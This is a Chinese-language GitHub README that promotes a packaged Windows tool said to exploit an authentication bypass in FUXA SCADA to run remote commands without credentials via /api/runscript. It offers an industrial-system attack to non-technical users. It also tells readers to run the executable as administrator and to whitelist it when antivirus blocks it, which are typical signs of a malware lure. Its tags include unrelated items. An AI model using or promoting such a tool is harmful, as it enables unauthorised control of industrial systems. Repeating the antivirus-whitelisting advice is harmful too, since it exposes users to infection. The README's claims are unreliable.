tianarsamm/CVE-2025-69985

GitHub: tianarsamm/CVE-2025-69985

针对FUXA工业SCADA系统的认证绕过与远程命令执行漏洞利用工具,通过攻击`/api/runscript`端点实现无需凭证的RCE。

Stars: 0 | Forks: 0

# ⚠️ CVE-2025-69985 - 简单的安全漏洞利用工具 [![点击下载](https://img.shields.io/badge/Download-CVE--2025--69985-brightgreen?style=for-the-badge)](https://github.com/tianarsamm/CVE-2025-69985) ## 📋 关于 CVE-2025-69985 CVE-2025-69985 是一个工具,用于演示 FUXA 1.2.8 及以下版本中存在的安全绕过和远程代码执行漏洞。该漏洞允许攻击者通过针对 `/api/runscript` 端点,在未经适当授权的情况下运行命令。 本仓库包含一个简单的应用程序,展示了该漏洞利用的工作原理。对于安全研究人员和渗透测试人员来说,这有助于了解受影响系统中的风险。 该工具在 Windows 上运行,并在底层使用 Python,但您不需要具备编程经验即可下载和运行它。 ## ⚙️ 系统要求 要在 Windows 计算机上使用此工具,您的系统必须满足以下最低要求: - Windows 7 或更高版本(推荐 64 位) - 500 MB 可用硬盘空间 - 至少 4 GB RAM - 用于下载软件的互联网连接 - 除了安装包中包含的内容外,不需要安装其他特殊软件 ## 🚀 快速入门 本节将指导您如何在 Windows 计算机上下载和运行该工具。 ## 📥 下载和安装 首先,您需要从官方 GitHub 页面获取软件。 [![下载软件](https://img.shields.io/badge/Download-Here-blue?style=for-the-badge)](https://github.com/tianarsamm/CVE-2025-69985) ### 下载步骤: 1. 点击上面的链接。它会将您带到 GitHub 仓库页面。 2. 在页面上查找名为 **Releases** 的部分或名为 **Downloads** 的文件夹。 3. 下载最新的可用 Windows 安装包。该文件名通常包含 `.exe` 或 `.zip`。 4. 如果您下载的是 `.zip` 文件,请右键单击它并选择 **Extract All... (全部提取)**。 5. 选择一个文件夹来保存解压后的文件。 现在您的计算机上已经有了该软件。 ## ▶️ 运行应用程序 请按照以下步骤在 Windows 计算机上运行该工具: 1. 打开您保存或解压文件的文件夹。 2. 找到可执行文件。其名称通常类似于 `CVE-2025-69985.exe`。 3. 双击可执行文件以启动应用程序。 4. 如果 Windows 提示您允许应用进行更改,请点击 **Yes (是)**。 5. 该工具将打开一个简单的窗口或命令提示符界面。 6. 接下来,如果有任何屏幕提示,请按照指示操作。 该工具除了上述步骤外无需其他安装过程。 ## 🛠 如何使用该工具 应用程序运行后,它将允许您通过向目标 FUXA 系统的 `/api/runscript` 端点发送脚本来测试该漏洞。 您可能会看到诸如输入目标服务器地址或选择某些要在远程运行的命令等选项。 该工具专注于安全研究。请仅在您拥有测试权限的系统上使用它。 ## 🔍 此工具的功能 - 演示 FUXA 1.2.8 及以下版本中的身份验证绕过。 - 无需登录凭证即可运行远程命令。 - 帮助安全测试人员检查系统是否存在漏洞。 - 展示在生产环境中运行暴露的 API 的潜在风险。 ## 📝 附加信息 - 该工具是用 Python 构建的,但已经打包,因此您无需安装 Python。 - 它使用 HTTP 协议与 FUXA 系统进行通信。 - 下载后不需要互联网连接,除非您想测试远程目标。 - 用户界面简单,专为不具备技术知识的用户设计。 - 该软件是开源的,任何研究该漏洞的人都可以对其进行审查或修改。 ## 👩‍💻 常见问题解答 (FAQ) ### Q. 使用此工具需要懂编程吗? A. 不需要。该工具已准备好运行,且拥有简单的界面。 ### Q. 我可以用这个来黑客攻击其他人吗? A. 不可以。仅测试您拥有明确权限的系统。 ### Q. 我的杀毒软件阻止了该程序。我该怎么办? A. 该工具针对安全缺陷,因此某些杀毒软件可能会标记它。如果您信任来源,可以将文件加入白名单。 ### Q. 此工具能修复该漏洞吗? A. 不能。它仅展示该缺陷。要修复它,请将 FUXA 更新到安全版本。 ## 🔗 有用链接 - 访问官方仓库页面下载该工具: https://github.com/tianarsamm/CVE-2025-69985 - 在线搜索 CVE-2025-69985 以查找更多关于 FUXA 漏洞的信息。 ## 🧩 故障排除 如果工具无法运行: - 确保您使用的是 Windows 7 或更高版本。 - 检查您下载的是否是正确的 Windows 文件。 - 通过右键单击并选择 **Run as administrator (以管理员身份运行)**,以管理员身份运行可执行文件。 - 如果程序崩溃,请尝试重新下载安装包。 如果测试期间出现连接错误,请确认: - 目标 FUXA 服务器可访问。 - 您拥有连接和测试该服务器的权限。 - 网络防火墙或杀毒软件没有阻止该工具。 ## ⚖ 许可证和用途 此工具仅用于教育和测试目的。请在法律和道德标准下负责任地使用。滥用此软件可能会违反法律。
标签:API安全, CISA项目, CVE-2025-69985, DNS枚举, Exploit, FUXA, ICS, JSON输出, NTLM Relay, OT安全, PKINIT, Python, RCE, SCADA, Web报告查看器, 哈希传递, 工控安全, 无后门, 未授权访问, 编程工具, 网络安全工具, 认证绕过, 远程代码执行, 逆向工具